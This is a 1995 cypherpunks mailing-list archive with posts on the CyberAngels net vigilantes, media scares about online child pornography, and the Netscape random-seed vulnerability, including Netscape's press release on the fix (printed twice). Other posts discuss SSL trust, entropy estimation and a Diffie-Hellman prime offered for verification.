To: cypherpunks@toad.com
Subject: Re: CyberAngels
In-Reply-To: <9qJZBD1w165w@left.webcasters.com>
Message-ID: <6RZZBD1w165w@left.webcasters.com>
MIME-Version: 1.0
Content-Type: text/plain


To: morning@npr.org
Cc: root
Subject: CyberAngels
From: jgrubs@left.webcasters.com (Jim Grubs (W8GRT))
Reply-To: jgrubs@left.webcasters.com (Jim Grubs (W8GRT))
Message-ID: <9qJZBD1w165w@left.webcasters.com>
Date: Mon, 25 Sep 95 09:09:55 EDT
Organization: WebCasters(tm)

-----BEGIN PGP SIGNED MESSAGE-----

Just what this world needs -- more vigilantees. To my mind, they are the
moral equivalent of the right wing militia groups.

A technical point: The piece would have the people who are not computer
literate believe that GIF and JPG are code words for porn pictures and are
used only in that context. The truth is they are merely computer filename
extensions used for two different graphical data formats. You will also find
GIF and JPG formatted images used on the Whitehouse WWW page, the Library of
Congress' THOMAS, and the WWW page for the Pope's visit to Baltimore - not to
mention the WWW page I just created for a customer selling polluted water
filtration systems.

I have never in my 62 years witnessed any news story on any subject about
which I had any personal knowledge or expertise that did not contain factual
errors. Is it any wonder that people are increasingly skeptical of the news
media?


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: LIBERTY!! Use it or lose it!!

iQCVAwUBMGavg974r4kaz3mVAQG+AgP9GWJ7B7QPCuIQ0HRhAebFkQHODTakPBQv
jHgaIZGrCkCcYVZ3BaVl1aYdDhCMDekkw6gfj9kcdlYN96sVxkqLv9gFVIZMu0sk
7/j4o9ishO8ALmZx7DYxhVfJZhCwYq7a5hZZaGz9nLxdRaQnzUNsYJKeE0bBfdLI
ZnPKM34WB0k=
=qELG
-----END PGP SIGNATURE-----

--
                        WebCasters(tm)
James C. Grubs                         jgrubs@left.webcasters.com
6817 Maplewood Avenue                         Tel.: 419-882-2697
Sylvania, Oh 43560                             Fax: 419-885-2814
  Internet consulting, HTML programming, Information brokering
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David J. Bianco" <bianco@itribe.net>
Date: Mon, 25 Sep 95 12:08:53 PDT
To: "Erik E. Fair"  (Time Keeper) <fair@clock.org>
Subject: Re: Persistent Services Needed
In-Reply-To: <v02110102ac8c96b652cf@[204.179.132.9]>
Message-ID: <199509251905.PAA28033@gatekeeper.itribe.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sep 25, 10:36, "Erik E. Fair"  (Time Keeper) sent the following to the
NSA's mail archives:
> Subject: Re: Persistent Services Needed
|| One way to establish persistent services is to use the DNS for
|| indirection:
|| register a name for a service (or a set of services), which then point
to
|| servers of those services by a DNS name. If the service needs to move
|| (hosts, net connections, etc), the only thing that changes is the
|| DNS zone file and the references to the service through the name stay
|| exactly the same. Hell, if your service requires no state information
|| or can have replicated data (e.g. DNS, FTP, WWW), you can use "round
|| robin" techniques with very low DNS RR TTL's to spread the service
|| load over a bunch of widely distributed hosts.
||

Sounds like a good idea to me. I've always kinda wondered why there wasn't
a cypherpunks.org or something.  It'd certainly make it easier for folks to
find us...


--
==========================================================================
David J. Bianco			| Web Wonders, Online Oddities, Cool Stuff
iTribe, Inc.			| Phone: (804) 446-9060 Fax: (804) 446-9061
Suite 1700, World Trade Center	| email: <bianco@itribe.net>
Norfolk, VA 23510		| URL  : http://www.itribe.net/~bianco/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Mon, 25 Sep 95 09:56:45 PDT
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: "Gnusaic"? Why not a Gnu-Style Web Browser?
In-Reply-To: <ac87162a440210044474@[205.199.118.202]>
Message-ID: <Pine.BSD.3.91.950925154514.28472A-100000@usr1.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain



   "free" access to source code and "free" source code w/ free binaries 
are too often confused. in and of itself, GNU or Stahlman are not 
providing free software for whatever use.  GNU allows free distribution, 
but not free commercialization --a good idea except critical maintenance 
is at the time-available consideration of the author.

   Sun permits access (well, relatively free) access to their source code 
for the Java Series and is actively promoting open porting. personally, I 
like Java/Hot Java.

   as to a GNU-like product, I concur with TCM -it needs to be done 
before the commerical interests, politicians, NSA, and assorted crooks 
control the means whereby we communicate, and the browser, IMHO, has 
improved our communication and access to information by many orders of 
magnitude. Now, if any of the non-Gates browsers could fully support 
multi-use/multi-view mail, news, and info browse at the same time....

   I have the code for Mosaic, Java, etc. --they are not trivial. and 
don't forget VGML.

=====================  ORIGINAL MESSAGE  =============================

On Thu, 21 Sep 1995, Timothy C. May wrote:

> 
> I'm pretty happy with Netscape 1.1N, but John Gilmore's point about NCSA
> Mosaic gives me a thought:
> 
>
   [snip]
> 
> Why not a Gnu-style Web browser? I don't know if the original Mosaic can be
> used and added to, but I can imagine something like this could be done.
> 
> Web browsers are becoming, for many of us, our de facto interfaces to the
> Net, not just the Web. A project to make a truly freely distributable Web
> browser and Web server (the other part of the puzzle) could be interesting.
> Strong crypto could be added by volunteers working in their specialties,
> and the "Web proxie" could be put in with robustness (D-H forward secrecy,
> for example).
>
   amen!
> 
> I'll stop now, as I've never been a Gnu customer (except for Emacs), and so
> I'm not really in a position to comment and speculate on Gnu.
> 
> For all I know, Stallman and others have already thought of this and are
> working on it.
> 
> --Tim May
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Mon, 25 Sep 95 16:06:25 PDT
To: tedwards@Glue.umd.edu (Thomas Grant Edwards)
Subject: Re: WSJ on Netscape Hole 3
In-Reply-To: <Pine.SUN.3.91.950925182134.14756E-100000@thrash.src.umd.edu>
Message-ID: <199509252300.QAA29812@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	He's -asking- for an exploit. Tshirts to Ray and the person who
does the exploit, if it gets written. Maybe I should just ring up 8lgm and
have them do one.


> 
> On Mon, 25 Sep 1995, John Young wrote:
> 
> >    The Wall Street Journal, September 25, 1995, p. B12.
> 
> >    Marc Andreessen, vice president of technology at Netscape,
> >    said the company will issue fixes for the recent glitches
> >    later this week. He added that it's unclear whether
> >    anything other than temporarily crashing a user's computer
> >    could result trom the recent flaw. 
> 
> Oh Marc, you didn't really want to say that, did you?
> 
> -Thomas
> 


-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
An Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jkandt@mail.wsdot.wa.gov (Jeff Kandt)
Date: Mon, 25 Sep 95 16:19:35 PDT
To: sharborth@hai-net.com
Subject: Re: Net KiddiePorn Hype on TV
Message-ID: <v01510106ac8c839e406c@[164.110.102.112]>
MIME-Version: 1.0
Content-Type: text/plain


>     That's not all.  This morning I was listening to National Peoples
>     Radio when there was a story about the "Cyber Angels."  It appears
>     that the "Guardian Angels" from NYC are now out on the net trying to
>     catch people talking about child pornography.
>
>     This will be real interesting to watch.  I don't remember all of the
>     story, but the best part I heard was when some "Cyber Angel" was
>     talking about listening a chat session and according to her, GIFs are
>     codewords for pornography.
>
>     wsh

I heard that piece too.  Sounded like a total PR move for Curtis
Slewah(sp?) and his Guardian Angels.  They certainly didn't sound like they
knew what they were doing, technically speaking.

Representatives from the EFF _AND_ the FBI talked about their "concerns"
over private attempts to patrol cyberspace.  The EFF representative pointed
out that when you "see" a 15 yo female being propositioned by a 45 yo male
you really have no idea if either party is what they purport to be.  The
FBI guy pointed out that there is no provision in the current law for
anyone other than law enforcement to posess child pornography and the mere
act of downloading such images, even if the intention is to turn them over
to the police, would put the "Angels" in violation of the law; also
concerned that they might get in the way of police undercover
investigations.  Slewah himself admitted that there is no way to guarantee
that his "Angels" don't tend towards pedophilia themselves and might not
have completely pure motives.

-Jeff

-------
Jeff Kandt           "They that give up essential liberty to obtain a little
jkandt@wsdot.wa.gov   temporary safety deserve neither liberty nor safety."
Ph:(360)664-3510 (W)       --Benjamin Franklin, 1759
PGP Fingerprint: F1 59 8F 88 85 4F 2F 65  C2 5F D3 B5 8C 71 E0 E3






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jeff Weinstein" <jsw@netscape.com>
Date: Mon, 25 Sep 95 16:20:41 PDT
To: cypherpunks@toad.com
Subject: Security Update news release
Message-ID: <9509251617.ZM167@tofuhut>
MIME-Version: 1.0
Content-Type: text/plain

  Here is the press release we put out this morning regarding the fix
for RNG seed and stack overflow problems.

	--Jeff

BETA VERSIONS OF NETSCAPE SECURITY UPDATE TO BE AVAILABLE WEDNESDAY FOR
FREE DOWNLOADING

Company Puts New Code on Net for Examination;
Outside Security Experts Reviewing Software

MOUNTAIN VIEW, Calif. (September 25, 1995) -- Netscape Communications
Corporation (NASDAQ:  NSCP) today announced that it has completed beta
versions of the security update for its client and server software and will
post the new software for free downloading from the Internet on Wednesday,
September 27.  The beta versions of the software updates, being posted
following a review by internal and outside experts, are in response to the
potential vulnerability in the company's security implementation discovered
last weekend by two University of California at Berkeley students.  In
addition, Netscape is taking the opportunity to include other improvements
with this update.

Netscape addressed the potential vulnerability by increasing the amount of
random information it uses to seed the random number generator in its
security implementation.  In Netscape's security approach, the random
number generated is used in a mathematical formula to create a "session
key" for encrypting information to be sent across the Internet.  The new
solution uses many times more random information than the previous version,
ensuring much greater degrees of difficulty in identifying the key used to
encrypt a particular session.  The solution is also now assembled in a
platform-dependent manner which, when combined with the increase in random
information, makes Netscape's products substantially more secure than
before the update.

Netscape's source code that will be used to address the potential
vulnerability has already been posted on the Internet so that it can be
reviewed by anyone wishing to do so.  This technique is often used in the
development of security software to ensure the highest level of inspection
possible before the final software is made available to customers.  The
code is also being reviewed by external security experts retained by
Netscape and various Netscape platform partners with expertise in specific
operating system environments to provide additional checks on the soundness
of Netscape's approach.

"We have always encouraged users to provide feedback on new versions of our
software, and our posting of this security source code on the Internet is a
natural extension of that approach," said  Mike Homer, vice president of
marketing at Netscape.  "We plan to continue to use the Internet to test
new software versions, as we will shortly with the beta version of our
newly announced Netscape Navigator 2.0.  We expect that this kind of open
review will help us continue to create products of the highest quality."

Netscape is using the opportunity of this week's beta releases to also
update other portions of its software, addressing such issues as
domain-name limitations in international versions of Netscape Navigator
and potential stack overflow conditions.  Netscape is also placing the beta
versions of the security updates for its Netscape servers on the Internet
for free download by customers.

"We process hundreds of customer orders daily using Netscape software.
Netscape's commitment to excellence as evidenced by the company's immediate
action in response to reported vulnerabilities is one of the many reasons
Internet Shopping Network has chosen Netscape products for conducting
Internet commerce," said Randy Adams, president of Internet Shopping
Network.  "We have built a multi-million dollar business on the Internet
using Netscape products and they are a major factor in our success."

The beta versions of the updated software -- Netscape Navigator 1.2.1b for
Windows, Netscape Navigator 1.1.1b for Macintosh and UNIX, Netscape
Commerce Server 1.1.1b, and Netscape Proxy Server 1.1.1b -- will be
available on Wednesday for downloading from Netscape's home page at
http://home.netscape.com.  All Netscape users are encouraged to download
the new versions as soon as possible to ensure they are using the most
up-to-date security software from Netscape.  Final versions of the updates
will be posted after all testing is complete.

Netscape Communications Corporation is a premier provider of open software
to enable people and companies to exchange information and conduct commerce
over the Internet and other global networks. The company was founded in
April 1994 by Dr. James H. Clark, founder of Silicon Graphics, Inc., a
Fortune 500 computer systems company;  and Marc Andreessen, creator of the
NCSA Mosaic research prototype for the Internet.  Traded on Nasdaq under
the symbol "NSCP", Netscape Communications Corporation is based in Mountain
View, California.
###
Additional information on Netscape Communications Corporation is available
on the Internet at http://home.netscape.com, by sending email to
info@netscape.com or by calling 415-528-2555.

Netscape Communications, the Netscape Communications logo, Netscape,
Netscape Navigator, Netscape Commerce Server and Netscape Proxy Server are
trademarks of Netscape Communications Corporation.  All other product names
are trademarks of their respective companies.

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.


We issued the following news release this morning:
----------------------

FOR IMMEDIATE RELEASE


BETA VERSIONS OF NETSCAPE SECURITY UPDATE TO BE AVAILABLE WEDNESDAY FOR
FREE DOWNLOADING

Company Puts New Code on Net for Examination;
Outside Security Experts Reviewing Software

MOUNTAIN VIEW, Calif. (September 25, 1995) -- Netscape Communications
Corporation (NASDAQ:  NSCP) today announced that it has completed beta
versions of the security update for its client and server software and will
post the new software for free downloading from the Internet on Wednesday,
September 27.  The beta versions of the software updates, being posted
following a review by internal and outside experts, are in response to the
potential vulnerability in the company's security implementation discovered
last weekend by two University of California at Berkeley students.  In
addition, Netscape is taking the opportunity to include other improvements
with this update.

Netscape addressed the potential vulnerability by increasing the amount of
random information it uses to seed the random number generator in its
security implementation.  In Netscape's security approach, the random
number generated is used in a mathematical formula to create a "session
key" for encrypting information to be sent across the Internet.  The new
solution uses many times more random information than the previous version,
ensuring much greater degrees of difficulty in identifying the key used to
encrypt a particular session.  The solution is also now assembled in a
platform-dependent manner which, when combined with the increase in random
information, makes Netscape's products substantially more secure than
before the update.

Netscape's source code that will be used to address the potential
vulnerability has already been posted on the Internet so that it can be
reviewed by anyone wishing to do so.  This technique is often used in the
development of security software to ensure the highest level of inspection
possible before the final software is made available to customers.  The
code is also being reviewed by external security experts retained by
Netscape and various Netscape platform partners with expertise in specific
operating system environments to provide additional checks on the soundness
of Netscape's approach.

"We have always encouraged users to provide feedback on new versions of our
software, and our posting of this security source code on the Internet is a
natural extension of that approach," said  Mike Homer, vice president of
marketing at Netscape.  "We plan to continue to use the Internet to test
new software versions, as we will shortly with the beta version of our
newly announced Netscape Navigator 2.0.  We expect that this kind of open
review will help us continue to create products of the highest quality."

Netscape is using the opportunity of this week's beta releases to also
update other portions of its software, addressing such issues as
domain-name limitations in international versions of Netscape Navigator
and potential stack overflow conditions.  Netscape is also placing the beta
versions of the security updates for its Netscape servers on the Internet
for free download by customers.

"We process hundreds of customer orders daily using Netscape software.
Netscape's commitment to excellence as evidenced by the company's immediate
action in response to reported vulnerabilities is one of the many reasons
Internet Shopping Network has chosen Netscape products for conducting
Internet commerce," said Randy Adams, president of Internet Shopping
Network.  "We have built a multi-million dollar business on the Internet
using Netscape products and they are a major factor in our success."

The beta versions of the updated software -- Netscape Navigator 1.2.1b for
Windows, Netscape Navigator 1.1.1b for Macintosh and UNIX, Netscape
Commerce Server 1.1.1b, and Netscape Proxy Server 1.1.1b -- will be
available on Wednesday for downloading from Netscape's home page at
http://home.netscape.com.  All Netscape users are encouraged to download
the new versions as soon as possible to ensure they are using the most
up-to-date security software from Netscape.  Final versions of the updates
will be posted after all testing is complete.

Netscape Communications Corporation is a premier provider of open software
to enable people and companies to exchange information and conduct commerce
over the Internet and other global networks. The company was founded in
April 1994 by Dr. James H. Clark, founder of Silicon Graphics, Inc., a
Fortune 500 computer systems company;  and Marc Andreessen, creator of the
NCSA Mosaic research prototype for the Internet.  Traded on Nasdaq under
the symbol "NSCP", Netscape Communications Corporation is based in Mountain
View, California.
###
Additional information on Netscape Communications Corporation is available
on the Internet at http://home.netscape.com, by sending email to
info@netscape.com or by calling 415-528-2555.

Netscape Communications, the Netscape Communications logo, Netscape,
Netscape Navigator, Netscape Commerce Server and Netscape Proxy Server are
trademarks of Netscape Communications Corporation.  All other product names
are trademarks of their respective companies.



Rosanne M. Siino
Director of Corporate Communications
Netscape Communications Corp.
415-528-2619





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Mon, 25 Sep 95 13:30:55 PDT
To: cypherpunks@toad.com
Subject: Re: List of US representitives
Message-ID: <199509252028.QAA18640@book.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <00996ED487C83F20.00003C77@sanchez.com>, gorkab@sanchez.com
("Brian Gorka") wrote:

>Someone posted a list of US reps awhile back...  Can someone forward me a
copy? 

Everything you need to know put pressure on Congress critters is at
http://www.NRA.org/pub/congress/104/
I especially recommend http://www.NRA.org/pub/congress/104/congress.awk.Z
- From the readme: "congress.awk is a comma-seperated database of congress
members & some unix awk code for manipulating the database"

- -- 
- -- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMGcQ9ioZzwIn1bdtAQHKLwGAnzE6f67qn0bZFVcOV/49gemiD9jAluJo
ageYFxFsIIbkD9q28/a/7yX/GKaDNTSu
=0h5T
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Fletcher <fletch@ain.bls.com>
Date: Mon, 25 Sep 95 13:39:29 PDT
To: cypherpunks@toad.com
Subject: Article in 9/25 Computerworld about Netscape
Message-ID: <9509252034.AA08024@outland>
MIME-Version: 1.0
Content-Type: text/plain


Just got the Sept 25th issue of Computer world in my box and it's got a
big first page article on the NS bugs.  They get the key lengths wrong
(30-bit and 300-bit), and they say that "... future products will also
use 300-bit keys."  And they mention Cypherpunks by name! :)

---
Fletch                                                     __`'/|
fletch@ain.bls.com  "Lisa, in this house we obey the       \ o.O'    ______
404 713-0414(w)	     Laws of Thermodynamics!" H. Simpson   =(___)= -| Ack. |
404 315-7264(h) PGP Print: 8D8736A8FC59B2E6 8E675B341E378E43  U      ------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Herb Sutter <herbs@interlog.com>
Date: Mon, 25 Sep 95 13:39:55 PDT
To: Jon Lasser <jlasser@rwd.goucher.edu>
Subject: Re: Notes security question
Message-ID: <199509252039.QAA12982@gold.interlog.com>
MIME-Version: 1.0
Content-Type: text/plain


At 14:52 1995.09.25 -0400, Jon Lasser wrote:
>On Fri, 22 Sep 1995, Herb Sutter wrote:
>
>> While I'm at it, here's a question I've been wondering about recently: Why
>> is it I've never heard of any security issues with Lotus Notes?  Are there
>> no known weaknesses?  Or did existing weaknesses just not get much press
>> because Notes isn't a commercially visible consumer product like Netscape?
>
>Perhaps the Notes pricing scheme is sooo outrageous (by the standards of 
>a student like myself, and probably most others, if it's still anything 
>like it was at the 1.0 release) that mostpeople have had zero opportunity 
>to examine the program, let alone really have time to play with it?

Good point.  However, since it's been around for years and is (in some
people's eyes, at least) cutting-edge secure replication technology, it made
me begin to wonder about the product's actual security.  All I know is that
they use one of RSADSI's libraries, since RSADSI mentions them in their
"here are our current users" advertising.

From the deafening silence, though, it seems like there's not a whole lot of
information or opinion either way on Notes' security...?

Herb

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Herb Sutter                 2228 Urwin, Suite 102       voice (416) 618-0184
Connected Object Solutions  Oakville ON Canada L6L 2T2    fax (905) 847-6019





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Barber <jeffb@sware.com>
Date: Mon, 25 Sep 95 14:13:36 PDT
To: ses@tipper.oit.unc.edu (Simon Spero)
Subject: Re: SSL Man-in-the-middle
In-Reply-To: <Pine.SOL.3.91.950925124443.359B-100000@chivalry>
Message-ID: <9509252112.AA29743@wombat.sware.com>
MIME-Version: 1.0
Content-Type: text/plain


Simon Spero writes:

> Exactly - the trust model used in Navigator 1.1N requires you to trust 
> every single owner of a valid certificate. Getting hold of any key is 
> vastly easier than having to obtain a specific key; in the worst case, 
> you just buy your own - SSL exchanges are repudiable, and a few simple 
> tricks can make sure you cerificiate doesn't show up in the "Document 
         ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
> Information" dialog box.

I'd appreciate some documentation for this, please.  How can you make
this happen?


-- Jeff



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Van Wie <dvw@hamachi.epr.com>
Date: Mon, 25 Sep 95 16:20:48 PDT
To: cypherpunks <cypherpunks@toad.com>
Subject: Re: `Random' seed.
Message-ID: <306738C3@hamachi>
MIME-Version: 1.0
Content-Type: text/plain



Matt Blaze <mab@crypto.com> wrote:

>Here's my current favorite quick-and-dirty true-random-in-software 
generator.
>Use at own risk and read the comments carefully...
[...]
> *      Physically random numbers (very nearly uniform)
> *      D. P. Mitchell
> *      Modified by Matt Blaze 2/95
[...]
> * WARNING: depending on the particular platform, truerand() output may
> * be biased or correlated.  In general, you can expect about 16 bits of
> * "pseudo-entropy" out of each 32 bit word returned by truerand(),
> * but it may not be uniformly diffused.

While this comment provides some general information, it does not give the 
expected entropy in the form of testable assumptions.  A first step in this 
direction is to provide the entropy series used to arrive at the 16 bit per 
32 bit word estimate.  The second step, as I recommended last week (RE: RNG 
Resource FAQ... on 9/22), is to provide a concise argument drawn directly 
from the mathematical weaknesses of the entropy series.  In that post, I 
posed the following four criteria because they address the mathematical 
(theoretical) weaknesses of the entropy series, while using a vocabulary 
that should be sensible to a rigorous designer:

1)  The states exist and can be identified.
2)  The number of states n is known.
3)  The index value i uniquely identifies a state.
4)  The function P_i is known and well-behaved.

In this way, an analyst can review both the entropy series itself, and a 
_concise_ statement of the criteria under which the series is defined (i.e. 
when the 4 mathematical weaknesses have been appropriately addressed), and 
the argument "why" has been scrutinized against the code or proposed design.

dvw




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Van Wie <dvw@hamachi.epr.com>
Date: Mon, 25 Sep 95 16:35:08 PDT
To: "Timothy C. May" <tcmay@got.net>
Subject: RE: More on "Entropy"
Message-ID: <30673C18@hamachi>
MIME-Version: 1.0
Content-Type: text/plain



David Van Wie wrote:

>>The entropy E is defined by the sum across n states of -P_i log_2(P_i),

Timothy C. May wrote:

>Hah! Another physicist converted to the information-theoretic view of 
entropy!

Indeed.  I was able to track down the literature, and it is most 
interesting.  I am still a little bit skeptical of the "superset including 
thermodynamic entropy" school of thought, but I haven't finished reading all 
of the materials yet!  Clearly, the IT "version" of entropy is a well 
defined and useful thing....

>I should've pointed out in my reading list that several names stand out in
>this interpretation:

I'll read with that endoresement in mind.  Your thoughts on rigorous, 
_concise_, design criteria for sources of entropy would be appreciated 
(unless there is good quality work in the literature I haven't come to yet).

dvw




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Van Wie <dvw@hamachi.epr.com>
Date: Mon, 25 Sep 95 16:48:37 PDT
To: "'cypherpunks'" <cypherpunks@toad.com>
Subject: RE: Netscape "random" number seed generator code available
Message-ID: <30673F3B@hamachi>
MIME-Version: 1.0
Content-Type: text/plain



Phil Karlton wrote:

>[You will be expected to show your work. :-)]

In the spirit of showing work, how about a run through the entropy series?

dvw




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Karn <karn@qualcomm.com>
Date: Tue, 26 Sep 95 06:31:45 PDT
To: ipsec-dev@eit.com
Subject: Primality verification needed
Message-ID: <199509260050.RAA14732@servo.qualcomm.com>
MIME-Version: 1.0
Content-Type: text/plain


Hi. I've generated a 2047-bit "strong" prime number that I would like to
use with Diffie-Hellman key exchange. I assert that not only is this number
'p' prime, but so is (p-1)/2.

I've used the mpz_probab_prime() function in the Gnu Math Package (GMP) version
1.3.2 to test this number. This function uses the Miller-Rabin primality test.
However, to increase my confidence that this number really is a strong prime,
I'd like to ask others to confirm it with other tests. Here's the number in hex:

72a925f760b2f954ed287f1b0953f3e6aef92e456172f9fe86fdd8822241b9c9788fbc289982743e
fbcd2ccf062b242d7a567ba8bbb40d79bca7b8e0b6c05f835a5b938d985816bc648985adcff5402a
a76756b36c845a840a1d059ce02707e19cf47af0b5a882f32315c19d1b86a56c5389c5e9bee16b65
fde7b1a8d74a7675de9b707d4c5a4633c0290c95ff30a605aeb7ae864ff48370f13cf01d49adb9f2
3d19a439f753ee7703cf342d87f431105c843c78ca4df639931f3458fae8a94d1687e99a76ed99d0
ba87189f42fd31ad8262c54a8cf5914ae6c28c540d714a5f6087a171fb74f4814c6f968d72386ef3
56a05180c3bec7ddd5ef6fe76b1f717b

The generator, g, for this prime is 2.

Thanks!

Phil Karn





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@polaris.mindport.net>
Date: Mon, 25 Sep 95 15:09:18 PDT
To: John Young <jya@pipeline.com>
Subject: Re: Golden Coy Freeh
In-Reply-To: <199509251253.IAA07006@pipe4.nyc.pipeline.com>
Message-ID: <Pine.SUN.3.91.950925180515.4198A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 25 Sep 1995, John Young wrote:

>    The New York Times, January 25, 1995, p. D5.
> 
>    The F.B.I. Sting Operation on Child Pornography Raises
>    Questions About Cryptography
> 
>    By Peter H. Lewis
> 
> 
>    Last week, Mr. Freeh stressed that he preferred a voluntary
>    approach. But "if consensus is impossible" on the
>    encryption issue, he said, the F.B.I. might consider other
>    approaches.
> 

I think it *tremendously* disturbing that the F.B.I. suddenly thinks 
itself part of the Legislative branch, able to make law and dictate 
policy to the rest of the country.

In fact there is a plague of this kind of thing, law making in the wrong 
channels, as if the executive agencies in the United States were suddenly 
able to implement their own law.

I think the F.B.I. needs to act like the Executive agency it is, advice 
the president, and then generally shut up.

In short, like small children, the F.B.I. should be seen, and not heard.

Unfortunately, I believe the children in this case will be Citizens of 
the United States.

> 
>    [End]

---
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sharborth@hai-net.com
Date: Mon, 25 Sep 95 15:08:05 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Net KiddiePorn Hype on TV
Message-ID: <9508258120.AA812078118@houston_cc_smtp.hai-net.com>
MIME-Version: 1.0
Content-Type: text/plain


     That's not all.  This morning I was listening to National Peoples 
     Radio when there was a story about the "Cyber Angels."  It appears 
     that the "Guardian Angels" from NYC are now out on the net trying to 
     catch people talking about child pornography.  
     
     This will be real interesting to watch.  I don't remember all of the 
     story, but the best part I heard was when some "Cyber Angel" was 
     talking about listening a chat session and according to her, GIFs are 
     codewords for pornography.
     
     wsh


______________________________ Reply Separator _________________________________
Subject: Net KiddiePorn Hype on TV
Author:  cypherpunks@toad.com (Cypherpunks Mailing List) at internet
Date:    25-09-95 11:28


Yet Another Alarmist TV Show About Child Molesters on the Net:
     
During their coverage of an NFL game on Sunday, the Fox announcers plugged 
an upcoming episode (sometime this week) of _New York Undercover_. They 
used a depressing line like "Think the Net is a safe place to play ?  Think 
again !"  Apparently the show will portray a child molester luring kids via 
the Net, etc., etc. "In a story pulled straight from today's headlines !"
     
Anyway, the mainstream media trashing of the Net continues. Check your local 
listings.
     
-Futplex <futplex@pseudonym.com>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Mon, 25 Sep 95 15:17:56 PDT
To: cypherpunks@toad.com
Subject: Re: PM's Netscape rant
Message-ID: <v02120d09ac8cd874354d@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:24 PM 9/25/95, Vladimir Z. Nuri wrote:
> however I haven't seen any
>well-deserved rebuttals however, so..

I believe I've seen enough.

<*PLONK!*>

Now, that's why I *bought* Eudora...

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Mittelhauser <jonm@netscape.com>
Date: Mon, 25 Sep 95 11:19:15 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape "random" number seed generator code available
In-Reply-To: <445j6k$h03@tera.mcom.com>
Message-ID: <446rp8$14h@tera.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


adam@lighthouse.homeport.org (Adam Shostack) wrote:
>Jeff Weinstein wrote:
>| 
>|   More on the RNG stuff.  On Unix systems we look for ~/.pgp/randseed.bin,
>| and feed it through the RNG hash.  On Unix and PC systems we feed the
>| environment through the hash, so that would be a good place for a
>| concerned user to put some random stuff of their own.
>
>On a SunOS (or any BSD) box ps -e will get you environment variables.
>
>ps -eaxuw
>USER       PID %CPU %MEM   SZ  RSS TT STAT START  TIME COMMAND
>root        53  0.0  0.0   68    0 ?  IW   Sep 19  0:02 portmap HOME=/
>PATH=/bin:/usr/bin:/usr/etc:/usr/ucb
>root        68  0.0  0.0   16    0 ?  I    Sep 19  0:00  (biod)
>root        58  0.0  0.0   40    0 ?  IW   Sep 19  0:00 keyserv HOME=/
>PATH=/bin:/usr/bin:/usr/etc:/usr/ucb

If you take a look at the code you will see that this (and a ton of
other things) are already being done...Jeff is only pointing out
an extra item which is of special interest to the people in this
group...we are no longer relying on any single item of data but
rather a very large set and constant re-seeding during idle loops...

-Jon






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@polaris.mindport.net>
Date: Mon, 25 Sep 95 15:25:36 PDT
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: PM's Netscape rant
In-Reply-To: <199509251924.MAA05096@netcom18.netcom.com>
Message-ID: <Pine.SUN.3.91.950925181054.4198B-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 25 Sep 1995, Vladimir Z. Nuri wrote:

> I thoroughly enjoyed PM's vituperative, venemous, and vitriolic
> Netscape rant. it just wouldn't be the cypherpunks list without 
